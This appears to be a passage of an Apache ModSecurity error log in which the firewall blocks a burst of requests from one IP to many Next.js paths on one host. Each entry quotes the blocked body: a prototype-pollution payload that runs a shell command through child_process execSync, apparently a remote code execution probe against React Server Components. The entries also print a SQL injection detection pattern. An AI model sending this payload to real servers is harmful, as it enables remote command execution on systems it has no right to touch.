Mar 03 03:59:12.332352 2026] [:error] [pid 21861:tid 21899] [client 172.94.9.249:47514] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/action"] [unique_id "aaZAcNsyBa6FPxjfniwsdwAAAEU"] [Tue Mar 03 03:59:12.343955 2026] [:error] [pid 21979:tid 21985] [client 172.94.9.249:47502] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "aaZAcP2xhCLtpShpTOoylgAAAMQ"] [Tue Mar 03 03:59:12.343955 2026] [:error] [pid 21862:tid 21925] [client 172.94.9.249:47526] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "aaZAcPh_lrWoDSo4I3RnvgAAAI8"] [Tue Mar 03 03:59:12.344457 2026] [:error] [pid 21979:tid 21989] [client 172.94.9.249:47512] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "aaZAcP2xhCLtpShpTOoylQAAAMg"] [Tue Mar 03 03:59:12.344494 2026] [:error] [pid 21979:tid 21997] [client 172.94.9.249:47572] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "aaZAcP2xhCLtpShpTOoylAAAANA"] [Tue Mar 03 03:59:12.375953 2026] [:error] [pid 21979:tid 21991] [client 172.94.9.249:47502] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/revalidate"] [unique_id "aaZAcP2xhCLtpShpTOoylwAAAMo"] [Tue Mar 03 03:59:12.375958 2026] [:error] [pid 21979:tid 21995] [client 172.94.9.249:47512] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "aaZAcP2xhCLtpShpTOoymAAAAM4"] [Tue Mar 03 03:59:12.376017 2026] [:error] [pid 21862:tid 21939] [client 172.94.9.249:47526] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/faq"] [unique_id "aaZAcPh_lrWoDSo4I3RnvwAAAJU"] [Tue Mar 03 03:59:12.376164 2026] [:error] [pid 21979:tid 22001] [client 172.94.9.249:47572] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/v1"] [unique_id "aaZAcP2xhCLtpShpTOoymQAAANQ"] [Tue Mar 03 03:59:12.376834 2026] [:error] [pid 21862:tid 21930] [client 172.94.9.249:47562] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/og"] [unique_id "aaZAcPh_lrWoDSo4I3RnwAAAAJE"] [Tue Mar 03 03:59:12.376930 2026] [:error] [pid 21862:tid 21939] [client 172.94.9.249:47508] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/v3"] [unique_id "aaZAcPh_lrWoDSo4I3RnwQAAAJU"] [Tue Mar 03 03:59:12.376946 2026] [:error] [pid 21979:tid 21992] [client 172.94.9.249:47536] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/v2"] [unique_id "aaZAcP2xhCLtpShpTOoymgAAAMs"] [Tue Mar 03 03:59:12.376971 2026] [:error] [pid 21979:tid 21988] [client 172.94.9.249:47546] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/image"] [unique_id "aaZAcP2xhCLtpShpTOoymwAAAMc"] [Tue Mar 03 03:59:12.377566 2026] [:error] [pid 21861:tid 21901] [client 172.94.9.249:47514] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/sitemap"] [unique_id "aaZAcNsyBa6FPxjfniwseAAAAEY"] [Tue Mar 03 03:59:12.407217 2026] [:error] [pid 21979:tid 22002] [client 172.94.9.249:47572] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/users"] [unique_id "aaZAcP2xhCLtpShpTOoynQAAANU"] [Tue Mar 03 03:59:12.407244 2026] [:error] [pid 21862:tid 21896] [client 172.94.9.249:47508] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "aaZAcPh_lrWoDSo4I3RnwgAAAIA"] [Tue Mar 03 03:59:12.407446 2026] [:error] [pid 21979:tid 21987] [client 172.94.9.249:47502] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/user"] [unique_id "aaZAcP2xhCLtpShpTOoyngAAAMY"] [Tue Mar 03 03:59:12.407751 2026] [:error] [pid 21979:tid 21994] [client 172.94.9.249:47546] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "aaZAcP2xhCLtpShpTOoynwAAAM0"] [Tue Mar 03 03:59:12.408269 2026] [:error] [pid 21979:tid 21996] [client 172.94.9.249:47536] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "aaZAcP2xhCLtpShpTOoyoAAAAM8"] [Tue Mar 03 03:59:12.408410 2026] [:error] [pid 21861:tid 21903] [client 172.94.9.249:47514] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match 